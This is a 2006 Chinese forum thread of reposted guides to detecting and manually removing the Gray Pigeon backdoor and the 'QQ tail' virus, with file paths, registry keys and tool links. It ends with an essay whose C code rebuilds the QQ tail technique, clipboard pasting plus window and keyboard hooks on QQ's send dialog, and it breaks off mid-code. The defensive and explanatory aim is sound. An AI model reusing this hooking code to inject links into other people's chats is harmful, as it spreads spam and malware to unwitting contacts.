【10】服务端以服务启动,支持发送多种组合键,可以轻松管理远程服务器!
【11】远程服务端自动升级功能:远程服务端可以自动升级到最新版本,不需用户手工升级,完全免去重新安全升级的烦琐工作!
【12】多种自动上线方式:专用上线、DNS解析域名、固定IP等,用户自由选择!



如您对网站有任何疑问请QQ:93612738,或联系服务

电话:13937851927,感谢您的关注!

@开封论坛:http://www.izhen.cn/,欢迎大家一起来建设!

论坛上回帖的意义和技巧(严重潜水者坚决清除)  回到顶部
帅哥哟,离线,有人找我吗?
追梦无极限
  4楼 | QQ | 信息 | 搜索 | 邮箱 | 主页 | UC


加好友 发短信 一直在用心
等级:管理员 帖子:9672 积分:69820 威望:21 精华:39 注册:2005-06-29 12:56:56
  发帖心情 Post By:2006-08-13 21:35:34 [显示全部帖子]

鉴于以上,所以中了之后应急时杀掉它

由于灰鸽子作者以及N多的编程朋友对之修复,变种参出不穷,杀毒软件也不一定能急时杀掉

所以有的时候手动杀还是有必要的,我们可以借用:Hijackthis
"HijackThis是由一位荷兰学生编写,它能够扫描注册表和硬盘上的特定文件,找到一些恶意程序(如恶意网页或蠕虫木马病毒)“劫持”浏览器或注册表的入口,并修复大部分被恶意修改的内容 "



灰鸽子以及变种的服务不定,所以用X代表变种名,变种不一样,所出现的X也不一样
一:先用Hijackthis修复这个O23项(修复它的服务)
O23 - Service: X_Server - Unknown - C:\WINDOWS\X_Server.exe

二:在安全模式下面打开注册表,搜索:X_Server,查找相关东东,并删除(在注册表中把它清理干净)
但是有的提示无法删除,你右键找到权限项,将完全控制打钩就可删除


三:删除病毒文件  用killbox填上路径,并删除:(下面的这些文件并不是都有,没有就算了),服务名=X
C:\windows\服务名.dll
C:\windows\服务名.exe
C:\windows\服务名.bat
C:\windows\服务名key.dll
C:\windows\服务名_hook.dll
C:\windows\服务名_hook2.dll

如果提示没有找到文件,没事,因为它可能本身不存在
只要找到的删掉就可以了

----------------------------------------------------------------------------------------------------------

下面以:(这里面的C:\WINDOWS\G_Server.exe,就是灰鸽子的服务了,G就是X了)
O23 - Service: Gray_Pigeon_Server - Unknown - C:\WINDOWS\G_Server.exe
为例,作个简单的操作步骤说明:

一:先用Hijackthis修复这个O23项(修复它的服务)
二:在安全模式下面打开注册表,搜索:G_Server,查找相关东东,并删除(在注册表中把它清理干净)
三:删除病毒文件
  用killbox填上路径,并删除:(下面的这些文件并不是都有,没有就算了)
  C:\WINDOWS\G_Server.exe
  C:\WINDOWS\G_Server.dll
  C:\WINDOWS\G_Serverkey.dll
  C:\WINDOWS\G_Server_hook.dll

至此,病毒已经完全清理完毕
以上操作最好在安全模式下面操作


如您对网站有任何疑问请QQ:93612738,或联系服务

电话:13937851927,感谢您的关注!

@开封论坛:http://www.izhen.cn/,欢迎大家一起来建设!

论坛上回帖的意义和技巧(严重潜水者坚决清除)  回到顶部
帅哥哟,离线,有人找我吗?
追梦无极限
  5楼 | QQ | 信息 | 搜索 | 邮箱 | 主页 | UC


加好友 发短信 一直在用心
等级:管理员 帖子:9672 积分:69820 威望:21 精华:39 注册:2005-06-29 12:56:56
  发帖心情 Post By:2006-08-13 21:37:32 [显示全部帖子]

BlackHole&灰鸽子后门专杀工具

下载地址:http://www.cert.org.cn/articles/tools/common/2005051322256.shtml

1、灰鸽子2005:
现在如果遇到这种灰鸽子病毒,在删除文件时要注意这样四种形式的病毒文件[病毒文件里大多数是隐藏属性的文件,查找删除前请先显示所有文件和文件夹(包括受保护的系统文件)]:
常见的有:1、 G_Server.exe,G_Server.dll,G_Server_Hook.dll
2、 IExplorer.exe,IExplorer.dll,,IExplorer_Hook.dll
3、 Winlogon.exe,Winlogon.dll,Winlogon_Hook.dll
可能有些文件名不同,不过都是这个规律*.exe , *.dll , *_Hook.dll
清除的方法:
Windows 9X/Me系统可以尝试先将它的启动项去掉。
Windows 2000/XP/2003系统到注册表编辑器中找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services下查找“文件名.EXE”,然后删除,重新启动后就能直接将那些病毒文件删除掉了。

可用金山木马专杀工具1.0

或者手工删掉2个文件,一劳永逸了
先进入安全模式,搜索在c:\下查找sv*文件,会出来很多,选择了两个(选择标准不具有说服性,因为我不太懂病毒,我刚才用瑞星过几次,结果每次都杀着杀着就重起,重起后又有又杀又重起,我删掉的是两个exe文件,而且修改时间是当时用瑞星杀毒时的时间),删掉,重起就好了


如您对网站有任何疑问请QQ:93612738,或联系服务

电话:13937851927,感谢您的关注!

@开封论坛:http://www.izhen.cn/,欢迎大家一起来建设!

免费广告位,欢迎刊登  回到顶部
帅哥哟,离线,有人找我吗?
追梦无极限
  6楼 | QQ | 信息 | 搜索 | 邮箱 | 主页 | UC


加好友 发短信 一直在用心
等级:管理员 帖子:9672 积分:69820 威望:21 精华:39 注册:2005-06-29 12:56:56
  发帖心情 Post By:2006-08-13 21:38:52 [显示全部帖子]

BlackHole&灰鸽子后门专杀工具
来源:CNCERT/CC 2005-05-13


软件名称:BlackHole&灰鸽子后门专杀工具
适用系统:WINNT/2000/XP/2003
文件大小:80KB
文件说明:本工具的功能为专门查找计算机上的BlackHole后门程序和灰鸽子后门程序。

BlackHole后门程序具有以下功能:
1、添加服务启动自身:
服务名:Windows MySQL Servers
路径:C:\WINDOWS\System32\Windows MySQL Servers.exe

2、释放并拷贝自身到系统%System%目录下,并设置文件属性为隐藏:
 文件列表:
 %System%\KeySpy.dll
 %System%\Windows MySQL Servers.cfg
 %System%\Windows MySQL Servers.exe

3、攻击者控制成功后,可使用如下后门功能进行远程操作:
抓取控制者屏幕,进程管理,获取系统缓存密码,远程注册表操作,远程重启关机,获取系统敏感配置信息,开启远程TELNET,文件上传下载,远程图形界面控制,开启键盘记录监听,如果对方存在摄像头则可以开启摄像头视频监控,可以录制远程的屏幕操作为影音文件。

灰鸽子后门程序具有以下功能:

  灰鸽子是国内一款著名后门。比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。

  灰鸽子客户端和服务端都是采用Delphi编写。黑客利用客户端程序配置出服务端程序。可配置的信息主要包括上线类型(如等待连接还是主动连接)、主动连接时使用的公网IP(域名)、连接密码、使 用的端口、启动项名称、服务名称,进程隐藏方式,使用的壳,代理,图标等等。


如您对网站有任何疑问请QQ:93612738,或联系服务

电话:13937851927,感谢您的关注!

@开封论坛:http://www.izhen.cn/,欢迎大家一起来建设!

论坛上回帖的意义和技巧(严重潜水者坚决清除)  回到顶部
帅哥哟,离线,有人找我吗?
追梦无极限
  7楼 | QQ | 信息 | 搜索 | 邮箱 | 主页 | UC


加好友 发短信 一直在用心
等级:管理员 帖子:9672 积分:69820 威望:21 精华:39 注册:2005-06-29 12:56:56
  发帖心情 Post By:2006-08-13 21:43:48 [显示全部帖子]

灰鸽子病毒手工清除方法[多图]

www.rising.com.cn 2005-2-1 11:23:00 信息源:瑞星公司 作者:刘明星

灰鸽子(Backdoor.Huigezi)作者现在还没有停止对灰鸽子的开发,再加上有些人为了避开杀毒软件的查杀故意给灰鸽子加上各种不同的壳,造成现在网络上不断有新的灰鸽子变种出现。尽管瑞星公司一直在不遗余力地收集最新的灰鸽子样本,但由于变种繁多,还会有一些“漏网之鱼”。如果您的机器出现灰鸽子症状但用瑞星杀毒软件查不到,那很可能是中了还没有被截获的新变种。这个时候,就需要手工杀掉灰鸽子。

手工清除灰鸽子并不难,重要的是我们必须懂得它的运行原理。

灰鸽子的运行原理

灰鸽子木马分两部分:客户端和服务端。黑客(姑且这么称呼吧)操纵着客户端,利用客户端配置生成出一个服务端程序。服务端文件的名字默认为G_Server.exe,然后黑客通过各种渠道传播这个木马(俗称种木马或者开后门)。种木马的手段有很多,比如,黑客可以将它与一张图片绑定,然后假冒成一个羞涩的MM通过QQ把木马传给你,诱骗你运行;也可以建立一个个人网页,诱骗你点击,利用IE漏洞把木马下载到你的机器上并运行;还可以将文件上传到某个软件下载站点,冒充成一个有趣的软件诱骗用户下载……

G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录,2k/NT下为系统盘的 Winnt目录),然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。G_Server.exe、 G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端,有些灰鸽子会多释放出一个名为 G_ServerKey.dll的文件用来记录键盘操作。注意,G_Server.exe这个名称并不固定,它是可以定制的,比如当定制服务端文件名为 A.exe时,生成的文件就是A.exe、A.dll和A_Hook.dll。

Windows目录下的G_Server.exe文件将自己注册成服务(9X系统写注册表启动项),每次开机都能自动运行,运行后启动 G_Server.dll和G_Server_Hook.dll并自动退出。G_Server.dll文件实现后门功能,与控制端客户端进行通信; G_Server_Hook.dll则通过拦截API调用来隐藏病毒。因此,中毒后,我们看不到病毒文件,也看不到病毒注册的服务项。随着灰鸽子服务端文件的设置不同,G_Server_Hook.dll有时候附在Explorer.exe的进程空间中,有时候则是附在所有进程中。

灰鸽子的手工检测

由于灰鸽子拦截了API调用,在正常模式下木马程序文件和它注册的服务项均被隐藏,也就是说你即使设置了“显示所有隐藏文件”也看不到它们。此外,灰鸽子服务端的文件名也是可以自定义的,这都给手工检测带来了一定的困难。

但是,通过仔细观察我们发现,对于灰鸽子的检测仍然是有规律可循的。从上面的运行原理分析可以看出,无论自定义的服务器端文件名是什么,一般都会在操作系统的安装目录下生成一个以“_hook.dll”结尾的文件。通过这一点,我们可以较为准确手工检测出灰鸽子木马。

由于正常模式下灰鸽子会隐藏自身,因此检测灰鸽子的操作一定要在安全模式下进行。进入安全模式的方法是:启动计算机,在系统进入Windows启动画面前,按下F8键(或者在启动计算机时按住Ctrl键不放),在出现的启动选项菜单中,选择“Safe Mode”或“安全模式”。

1、由于灰鸽子的文件本身具有隐藏属性,因此要设置Windows显示所有文件。打开“我的电脑”,选择菜单“工具”—》“文件夹选项”,点击“查看”,取消“隐藏受保护的操作系统文件”前的对勾,并在“隐藏文件和文件夹”项中选择“显示所有文件和文件夹”,然后点击“确定”。

2、打开Windows的“搜索文件”,文件名称输入“_hook.dll”,搜索位置选择Windows的安装目录(默认98/xp为C:\windows,2k/NT为C:\Winnt)。

3、经过搜索,我们在Windows目录(不包含子目录)下发现了一个名为Game_Hook.dll的文件。



4、根据灰鸽子原理分析我们知道,如果Game_Hook.DLL是灰鸽子的文件,则在操作系统安装目录下还会有Game.exe和Game.dll文件。打开Windows目录,果然有这两个文件,同时还有一个用于记录键盘操作的GameKey.dll文件。

经过这几步操作我们基本就可以确定这些文件是灰鸽子木马了,下面就可以进行手动清除。另外,如果你发现了瑞星杀毒软件查不到的灰鸽子变种,也欢迎登陆瑞星新病毒上报网站(http://up.rising.com.cn)上传样本。

灰鸽子的手工清除

经过上面的分析,清除灰鸽子就很容易了。清除灰鸽子仍然要在安全模式下操作,主要有两步:1、清除灰鸽子的服务;2删除灰鸽子程序文件。

注意:为防止误操作,清除前一定要做好备份。

一、清除灰鸽子的服务

2000/XP系统:

1、打开注册表编辑器(点击“开始”-》“运行”,输入“Regedit.exe”,确定。),打开 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services注册表项。

2、点击菜单“编辑”-》“查找”,“查找目标”输入“game.exe”,点击确定,我们就可以找到灰鸽子的服务项(此例为Game_Server)。

3、删除整个Game_Server项。

98/me系统:

在9X下,灰鸽子启动项只有一个,因此清除更为简单。运行注册表编辑器,打开HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\Run项,我们立即看到名为Game.exe的一项,将Game.exe项删除即可。

二、删除灰鸽子程序文件

删除灰鸽子程序文件非常简单,只需要在安全模式下删除Windows目录下的Game.exe、Game.dll、Game_Hook.dll以及Gamekey.dll文件,然后重新启动计算机。至此,灰鸽子已经被清除干净。

小结

本文给出了一个手工检测和清除灰鸽子的通用方法,适用于我们看到的大部分灰鸽子木马及其变种,然而仍有极少数变种采用此种方法无法检测和清除。同时,随着灰鸽子新版本的不断推出,作者可能会加入一些新的隐藏方法、防删除手段,手工检测和清除它的难度也会越来越大。当你确定机器中了灰鸽子木马而用本文所述的方法又检测不到时,最好找有经验的朋友帮忙解决。

同时随着瑞星杀毒软件2005版产品发布,杀毒软件查杀未知病毒的能力得到了进一步提高。经过瑞星公司研发部门的不断努力,灰鸽子病毒可以被安全有效地自动清除,需要用户手动删除它的机会也将越来越少。



如您对网站有任何疑问请QQ:93612738,或联系服务

电话:13937851927,感谢您的关注!

@开封论坛:http://www.izhen.cn/,欢迎大家一起来建设!

论坛上回帖的意义和技巧(严重潜水者坚决清除)  回到顶部
帅哥哟,离线,有人找我吗?
追梦无极限
  8楼 | QQ | 信息 | 搜索 | 邮箱 | 主页 | UC


加好友 发短信 一直在用心
等级:管理员 帖子:9672 积分:69820 威望:21 精华:39 注册:2005-06-29 12:56:56
  发帖心情 Post By:2006-08-13 21:50:41 [显示全部帖子]

灰鸽子(Huigezi、Gpigeon)专用检测清除工具

软件大小: 414KB
授权方式: 免费软件

由灰鸽子工作室开发的,针对灰鸽子专用清除器!可以清除VIP2005版灰鸽子服务端程序(包括杀毒软件杀不到的灰鸽子服务端)和灰鸽子 [辐射正式版] 和 DLL版服务端 牵手版服务端

运行DelHgzvip2005Server.exe文件清除VIP2005版灰鸽子服务端程序,运行un_hgzserver.exe文件清除灰鸽子 [辐射正式版] 和 DLL版服务端 牵手版服务端
--------中天【366tian】技术组成员hongliu 2005年8月5日

http://www.366tian.net/soft/data/soft/875.html


如您对网站有任何疑问请QQ:93612738,或联系服务

电话:13937851927,感谢您的关注!

@开封论坛:http://www.izhen.cn/,欢迎大家一起来建设!

论坛上回帖的意义和技巧(严重潜水者坚决清除)  回到顶部
帅哥哟,离线,有人找我吗?
追梦无极限
  9楼 | QQ | 信息 | 搜索 | 邮箱 | 主页 | UC


加好友 发短信 一直在用心
等级:管理员 帖子:9672 积分:69820 威望:21 精华:39 注册:2005-06-29 12:56:56
  发帖心情 Post By:2006-08-13 22:04:40 [显示全部帖子]

太多了,今天暂时发这么多,中毒的朋友慢慢看吧


如您对网站有任何疑问请QQ:93612738,或联系服务

电话:13937851927,感谢您的关注!

@开封论坛:http://www.izhen.cn/,欢迎大家一起来建设!

论坛上回帖的意义和技巧(严重潜水者坚决清除)  回到顶部
帅哥哟,离线,有人找我吗?
追梦无极限
  10楼 | QQ | 信息 | 搜索 | 邮箱 | 主页 | UC


加好友 发短信 一直在用心
等级:管理员 帖子:9672 积分:69820 威望:21 精华:39 注册:2005-06-29 12:56:56
  发帖心情 Post By:2006-08-14 21:50:27 [显示全部帖子]

以下是引用孙金盛在2006-8-14 12:41:05的发言:
ghost一下或者还原一下94了

看我前几天的经历了吗?



如您对网站有任何疑问请QQ:93612738,或联系服务

电话:13937851927,感谢您的关注!

@开封论坛:http://www.izhen.cn/,欢迎大家一起来建设!

 回到顶部
帅哥哟,离线,有人找我吗?
追梦无极限
  11楼 | QQ | 信息 | 搜索 | 邮箱 | 主页 | UC


加好友 发短信 一直在用心
等级:管理员 帖子:9672 积分:69820 威望:21 精华:39 注册:2005-06-29 12:56:56
  发帖心情 Post By:2006-08-17 20:37:59 [显示全部帖子]

QQ尾巴”的病毒清除和预防``

一些别有用心的人利用QQ传播木马病毒,俗称“QQ尾巴”和“QQ林妹妹”。该病毒会偷偷藏在用户的系统中,发作时会寻找QQ窗口,给在线上的QQ好友发送诸如“快去这看看,里面有蛮好的东西--”之类的假消息,诱惑用户点击一个网站,如果有人信以为真点击该链接的话,就会被病毒感染,然后成为毒源,继续传播。
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]该病毒并不是利用QQ本身的安全漏洞传播.此病毒其实是在一些知名度不甚高的网站首页上嵌入了一段恶意代码,利用windows系统下Internet Explorer的iFrame系统漏洞自动运行恶意木马程序,从而达到侵入用户系统,进而借助QQ进行垃圾信息发送的目的。这类网站我们暂且称其为垃圾网站,用户机器如果没有安装系统漏洞补丁或者升级IE到6.0版本,那么使用IE内核系列的浏览器访问这些垃圾网站,其访问的网页中嵌入的恶意代码即被运行,就会紧接着通过IE的漏洞运行一个木马程序进驻用户机器。然后在用户使用QQ向好友发送信息的时候,该木马程序会自动在发送的消息末尾插入一段广告词,通常都是以下几句中的一种。
[$nbsp][$nbsp][$nbsp]1. HoHo~~ http//www.mm**.com刚刚朋友给我发来的这个东东。你不看看就后悔哦,嘿嘿。也给你的朋友吧。呵呵,其实我觉得这个网站真的不错,你看看 http//www.ktv***.com/

2. 想不想来点摇滚粗口舞曲,中华 DJ 第一站,网址告诉你 http//www.qq33**.com.。不要告诉别人 ~ 哈哈,真正算得上是国内最棒的 DJ 站点。

3. http//www.hao***.com 帮忙看看这个网站打不打的开。

4. http//ni***.126.com 看看啊. 我最近照的照片~ 才扫描到网上的。看看我是不是变了样?

解决方法:

一、随时升级杀毒软件

  为长期有效地防止病毒肆虐,为用户提供最完善的服务,腾讯公司近日和国内著名的金山、瑞星公司达成协议,上两公司已将相关的病毒专杀工具正式授权给腾讯公司,广大 QQ 用户可以直接从腾讯网站下载及时有效的病毒专杀工具。

腾讯公司同时提醒用户及时升级到金山毒霸或者瑞星杀毒最新版,以对付可能发生的病毒蔓延。
  金山毒霸网址:http://www.duba.net
  瑞星杀毒网址:http://www.rising.com.cn

二、安装系统漏洞补丁

  由上述的病毒传播方式我们可以知道,即使不执行病毒文件,病毒依然可以借由系统的漏洞自动执行,达到感染的目的。因此随时安装系统漏洞补丁和升级杀毒软件一样的重要。为IE6的漏洞打补丁就可以修补iFrame漏洞,防患于未然。
   IE6 补丁下载地址:
http://www.microsoft.com/windows ... 319182/download.asp

提示:
[$nbsp][$nbsp][$nbsp][$nbsp]QQ尾巴链接的有些网站上有这样的内容――“欲观看更多精彩影片,请刷新安装“藏鲸阁”插件(会自动跳出,点击“是”即可),如果不能观看影片,请确定您是否已经下载安装了Realplayer或Mediaplayer”。腾讯公司建议用户不要安装“藏鲸阁”插件。因为该插件可以被某些不良网站利用,装上它之后登录某些不良网站就可能会自动从网上下载并安装一些木马病毒到您的机器上,即使您使用的是IE6.0SP1并打上了最新的补丁也无济于事。

  在“藏鲸阁”的发布网站上提供了一个“网页自动下载运行系统”工具:exe2htm.exe。利用该工具可定做一个htm文件,通过“藏鲸阁”自动下载运行指定的文件,这个过程在已经安装了“藏鲸阁”的系统中并不需要征求用户的同意,只会显示一个大小可以在那个htm文件中设置的下载进度界面,那些不良网站通常会把它的大小设置为0,使用户看不到这个过程,从而入侵用户系统。

   一些专杀工具连接:http://it.rising.com.cn/service/technology/RS_QQMsender.htm
       
       http://down1.tech.sina.com.cn/do ... 04-03-16/3760.shtml

       http://bbs.445566.com/2/3/5.html

       http://www.52lg.com/down/view.asp?id=1
       
       http://feidian.jahee.com/Soft_Show.asp?SoftID=6


如您对网站有任何疑问请QQ:93612738,或联系服务

电话:13937851927,感谢您的关注!

@开封论坛:http://www.izhen.cn/,欢迎大家一起来建设!

论坛上回帖的意义和技巧(严重潜水者坚决清除)  回到顶部
帅哥哟,离线,有人找我吗?
追梦无极限
  12楼 | QQ | 信息 | 搜索 | 邮箱 | 主页 | UC


加好友 发短信 一直在用心
等级:管理员 帖子:9672 积分:69820 威望:21 精华:39 注册:2005-06-29 12:56:56
  发帖心情 Post By:2006-08-17 20:38:36 [显示全部帖子]

虽然现在的人大部分都知道了QQ尾巴病毒,但是总有不小心感染的用户。

首先来分析一下QQ尾巴病毒的原理!!

第一:“QQ尾巴病毒”核心技术的实现

声明:本文旨在探讨技术,请读者不要使用文章中的方法进行任何破坏。

2003这一年里,QQ尾巴病毒可以算是风光了一阵子。它利用IE的邮件头漏洞在QQ上疯狂传播。中毒者在给别人发信息时,病毒会自动在信息文本的后边添上一句话,话的内容多种多样,总之就是希望信息的接收者点击这句话中的URL,成为下一个中毒者。

下面我将要讨论的,就是QQ尾巴病毒使用的这一技术。由于病毒的源代码无法获得,所以以下的代码全是我主观臆断所得,所幸的是效果基本与病毒本身一致。

粘贴尾巴

  首先的一个最简单的问题是如何添加文本。这一技术毫无秘密可言,就是通过剪贴板向QQ消息的那个RichEdit“贴”上一句话而已。代码如下:
TCHAR g_str[] = "欢迎来我的小站坐坐:http://titilima.nease.net";
// 函数功能:向文本框中粘贴尾巴
void PasteText(HWND hRich)
{
[$nbsp][$nbsp]HGLOBAL hMem;
[$nbsp][$nbsp]LPTSTR pStr;
[$nbsp][$nbsp]// 分配内存空间
[$nbsp][$nbsp]hMem = GlobalAlloc(GHND | GMEM_SHARE, sizeof(g_str));
[$nbsp][$nbsp]pStr = GlobalLock(hMem);
[$nbsp][$nbsp]lstrcpy(pStr, g_str);
[$nbsp][$nbsp]GlobalUnlock(hMem);
[$nbsp][$nbsp]OpenClipboard(NULL);
[$nbsp][$nbsp]EmptyClipboard();
[$nbsp][$nbsp]// 设置剪贴板文本
[$nbsp][$nbsp]SetClipboardData(CF_TEXT, hMem);
[$nbsp][$nbsp]CloseClipboard();
[$nbsp][$nbsp]// 释放内存空间
[$nbsp][$nbsp]GlobalFree(hMem);
[$nbsp][$nbsp]// 粘贴文本
[$nbsp][$nbsp]SendMessage(hRich, WM_PASTE, 0, 0);
}

钩子

  好了,那么下面的问题是,这段文本应该在什么时候贴呢?网上有一些研究QQ尾巴实现的文章指出,可以用计时器来控制粘贴的时间,类似这个样子:
void CQQTailDlg::OnTimer(UINT nIDEvent)
{
[$nbsp][$nbsp]PasteText(hRich);
}
  这的确是一种解决的手段,然而它也存在着极大的局限性——计时器的间隔如何设置?也许中毒者正在打字,尾巴文本“唰”的出现了……
  然而病毒本身却不是这样子,它能够准确地在你单击“发送”或按下Ctrl+Enter键的时候将文本粘贴上。2003年1月份我的一台P2曾经中过毒,由于系统速度较慢,所以可以很清楚地看见文本粘贴的时机。
  讲到这里,我所陈述的这些事实一定会让身为读者的你说:钩子!——对,就是钩子,下面我所说的正是用钩子来真实地再现“QQ尾巴病毒”的这一技术。
  首先我对钩子做一个简要的介绍,已经熟悉钩子的朋友们可以跳过这一段。所谓Win32钩子(hook)并不是铁钩船长那只人工再现的手臂,而是一段子程序,它可以用来监视、检测系统中的特定消息,并完成一些特定的功能。打个比方来说,你的程序是皇帝,Windows系统充当各省的巡抚;至于钩子,则可以算是皇上的一个钦差。譬如皇帝下旨在全国收税,然后派了一个钦差找到山西巡抚说:“皇上有旨,山西除正常赋税外,加收杏花村酒十坛。”(-_-#……)正如皇帝可以用这种方法来特殊对待特定的巡抚一样,程序员也可以用钩子来捕获处理Windows系统中特定的消息。
  问题具体到了“QQ尾巴病毒”上边,就是我们需要一个钩子,在用户单击了“发送”按钮之后,粘贴我们的文本。我所实现的这段钩子过程为(至于如何挂接这个钩子,我会在稍后说明):
// 钩子过程,监视“发送”的命令消息
LRESULT CALLBACK CallWndProc(int nCode, WPARAM wParam, LPARAM lParam)
{
[$nbsp][$nbsp]CWPSTRUCT *p = (CWPSTRUCT *)lParam;
[$nbsp][$nbsp]// 捕获“发送”按钮
[$nbsp][$nbsp]if (p->message == WM_COMMAND && LOWORD(p->wParam) == 1)
[$nbsp][$nbsp][$nbsp][$nbsp]PasteText(g_hRich);
[$nbsp][$nbsp]return CallNextHookEx(g_hProc, nCode, wParam, lParam);
}
  在此我对这个回调过程说明几点:
  1、lParam是一个指向CWPSTRUCT结构的指针,这个结构的描述如下:
typedef struct {
[$nbsp][$nbsp]LPARAM lParam;
[$nbsp][$nbsp]WPARAM wParam;
[$nbsp][$nbsp]UINT message;
[$nbsp][$nbsp]HWND hwnd;
} CWPSTRUCT, *PCWPSTRUCT;
  这时候像我一样的SDK fans也许会会心一笑:这不是窗口回调的那四个铁杆参数么?如你所说,的确是这样,你甚至可以使用switch (p->message) { /* ... */ }这样的代码写成的钩子函数来全面接管QQ窗口。
  2、g_hRich是一个全局变量,它保存的是QQ消息文本框的句柄。这里之所以采用全局变量,是因为我无法从键盘钩子回调函数的参数中获得这个句柄。至于如何获得这个句柄以及这个全局变量的特殊位置,我会在稍后说明。
  3、CallNextHookEx是调用钩子链中的下一个处理过程,换了钦差就会说:“十坛杏花村酒本钦差已经替皇上收下了,现在请巡抚大人把贵省正常的赋税交上来吧。”(-_-#……)这是书写钩子函数中很重要的一个环节,如果少了这一句,那么可能会导致系统的钩子链出现错误,某些程序也会没有响应——事实上我在编写这个仿真程序的时候QQ就当掉了几回。
  4、你也许会问为什么我捕获的是WM_COMMAND消息,这个原因让我来用下面的SDK代码(虽然QQ是用MFC写的,但是用SDK代码才能说明WM_COMMAND和“发送”按钮的关系)来说明:
#define IDC_BTN_SENDMSG 1 // “发送”按钮ID的宏定义
// QQ发送消息对话框回调过程·李马伪造版
LRESULT CALLBACK ProcSendDlg(HWND hDlg, UINT Msg, WPARAM wParam, LPARAM lParam)
{
[$nbsp][$nbsp]switch (Msg)
[$nbsp][$nbsp]{
[$nbsp][$nbsp]case WM_CLOSE:
[$nbsp][$nbsp][$nbsp][$nbsp]EndDialog(hDlg, 0);
[$nbsp][$nbsp][$nbsp][$nbsp]break;
[$nbsp][$nbsp]case WM_COMMAND:
[$nbsp][$nbsp][$nbsp][$nbsp]{
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]switch (LOWORD(wParam))
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]{
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]case IDC_BTN_SENDMSG:
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]// 发送消息...
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]break;
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]// 其它的命令按钮处理部分...
[$nbsp][$nbsp][$nbsp][$nbsp]}
[$nbsp][$nbsp]}
[$nbsp][$nbsp]break;
[$nbsp][$nbsp]// 其它的case部分...
[$nbsp][$nbsp]}
[$nbsp][$nbsp]return 0;
}
  消息发送的整个过程是:当用户单击了“发送”按钮后,这个按钮的父窗口(也就是“发送消息”的对话框)会收到一条WM_COMMAND的通知消息,其中wParam的低位字(即LOWORD(wParam))为这个按钮的ID,然后再调用代码中发送的部分,所以,在此我捕获WM_COMMAND消息要比捕获其它消息或挂接鼠标钩子要有效得多。
  好了,现在这个钩子已经可以胜利地完成任务了。但是请不要忘记:有更多的用户更偏爱于用“Ctrl+Enter”热键来发送消息,所以程序中还需要挂上一个键盘钩子:
// 键盘钩子过程,监视“发送”的热键消息
LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
[$nbsp][$nbsp]// 捕获热键消息
[$nbsp][$nbsp]if (wParam == VK_RETURN && GetAsyncKeyState(VK_CONTROL) < 0 && lParam >= 0)
[$nbsp][$nbsp][$nbsp][$nbsp]PasteText(g_hRich);
[$nbsp][$nbsp]return CallNextHookEx(g_hKey, nCode, wParam, lParam);
}
  在这里唯一要解释的一点就是lParam >= 0子句。很明显这个if判断是在判断热键Ctrl+Enter的输入,那么lParam >= 0又是什么呢?事实上在键盘钩子的回调之中,lParam是一个很重要的参数,它包含了击键的重复次数、扫描码、扩展键标志等等的信息。其中lParam的最高位(0x80000000)则表示了当前这个键是否被按下,如果这个位正在被按下,这个位就是0,反之为1。所以lParam >= 0的意思就是在WM_KEYDOWN的时候调用PasteText,也就是说,如果去掉这个条件,PasteText将会被调用两次(连同WM_KEYUP的一次)。

挂接钩子和查找窗口

  接下来就是如何挂接这两个钩子了。对于挂接钩子,要解决的问题是:往哪里挂接钩子,以及如何挂接?
  挂接钩子的目标,肯定是QQ“发送信息”窗口的所属线程。我的代码就是将这个窗口的句柄传入之后来进行钩子的挂接:
// 挂接钩子
BOOL WINAPI SetHook(HWND hQQ)
{
[$nbsp][$nbsp]BOOL bRet = FALSE;
[$nbsp][$nbsp]if (hQQ != NULL)
[$nbsp][$nbsp]{
[$nbsp][$nbsp][$nbsp][$nbsp]DWORD dwThreadID = GetWindowThreadProcessId(hQQ, NULL);
[$nbsp][$nbsp][$nbsp][$nbsp]// 感谢好友hottey的查找代码,省去了我使用Spy++的麻烦
[$nbsp][$nbsp][$nbsp][$nbsp]g_hRich = GetWindow(GetDlgItem(hQQ, 0), GW_CHILD);
[$nbsp][$nbsp][$nbsp][$nbsp]if (g_hRich == NULL)
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]return FALSE;
[$nbsp][$nbsp][$nbsp][$nbsp]// 挂接钩子
[$nbsp][$nbsp][$nbsp][$nbsp]g_hProc = SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc, g_hInstDLL, dwThreadID);
[$nbsp][$nbsp][$nbsp][$nbsp]g_hKey = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_hInstDLL, dwThreadID);
[$nbsp][$nbsp][$nbsp][$nbsp]bRet = (g_hProc != NULL) [$& (g_hKey != NULL)]
[$nbsp][$nbsp]}
[$nbsp][$nbsp]else
[$nbsp][$nbsp]{
[$nbsp][$nbsp][$nbsp][$nbsp]// 卸载钩子
[$nbsp][$nbsp][$nbsp][$nbsp]bRet = UnhookWindowsHookEx(g_hProc) [$& UnhookWindowsHookEx(g_hKey)]
[$nbsp][$nbsp][$nbsp][$nbsp]g_hProc = NULL;
[$nbsp][$nbsp][$nbsp][$nbsp]g_hKey = NULL;
[$nbsp][$nbsp][$nbsp][$nbsp]g_hRich = NULL;
[$nbsp][$nbsp]}
[$nbsp][$nbsp]return bRet;
}
